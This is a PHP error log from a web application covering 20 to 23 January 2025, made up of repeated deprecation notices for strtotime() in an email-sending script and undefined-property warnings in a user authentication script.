[20-Jan-2025 02:19:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 02:19:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 02:20:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 02:20:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 02:20:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 03:31:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 03:58:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 03:59:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 03:59:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 04:00:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:13:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 04:21:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 04:38:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:39:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:43:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:44:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:44:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:44:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:56:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:57:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 04:57:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:00:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:00:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:18:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:19:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:20:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:20:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:29:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 05:30:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 05:41:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 05:41:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 07:10:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 10:30:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 10:30:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 10:30:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 10:31:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 10:31:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 10:31:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 10:31:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Jan-2025 21:32:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Jan-2025 23:00:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 00:29:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 00:50:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 00:51:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 00:54:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 01:00:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 02:23:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 02:53:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 02:55:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 02:55:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 02:55:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 03:32:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 03:39:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 04:15:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 04:21:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 04:42:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 05:19:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 05:32:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 05:36:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 06:44:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 07:31:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 11:25:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 11:25:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:25:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:26:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:26:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:26:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:27:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:27:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:28:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:29:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:30:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:31:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:31:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:42:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 11:43:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:46:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:47:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:48:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:48:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:49:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:50:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 11:50:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:38:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Jan-2025 22:39:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:39:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:39:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:40:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:40:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 22:40:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [21-Jan-2025 23:25:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 00:04:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 00:04:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 00:40:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 00:42:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 00:43:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 01:00:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 01:07:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 01:07:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 01:29:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 02:42:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 02:58:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 03:30:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 04:00:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 04:01:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 04:02:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:18:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:49:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:51:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:51:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:52:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:54:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:54:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:54:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 04:55:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 05:13:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 05:13:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 05:25:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 05:25:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 05:26:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 05:26:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 07:16:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 12:30:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 12:31:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:32:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:32:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:32:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:33:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:33:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:33:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:34:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:34:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 12:35:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 13:31:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 16:24:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 21:27:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:06:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:10:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:11:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:11:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:11:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:11:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:17:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:19:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:20:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:20:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:21:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 22:36:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 22:40:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 23:05:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Jan-2025 23:31:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 23:43:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 23:48:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 23:50:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Jan-2025 23:51:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 01:04:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 01:34:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 01:49:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 03:01:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 03:09:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 03:13:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 03:31:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 04:34:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 04:34:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 05:30:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 06:25:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 07:25:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 09:29:48 UTC] PHP Warning: Undefined property: stdClass::$status in 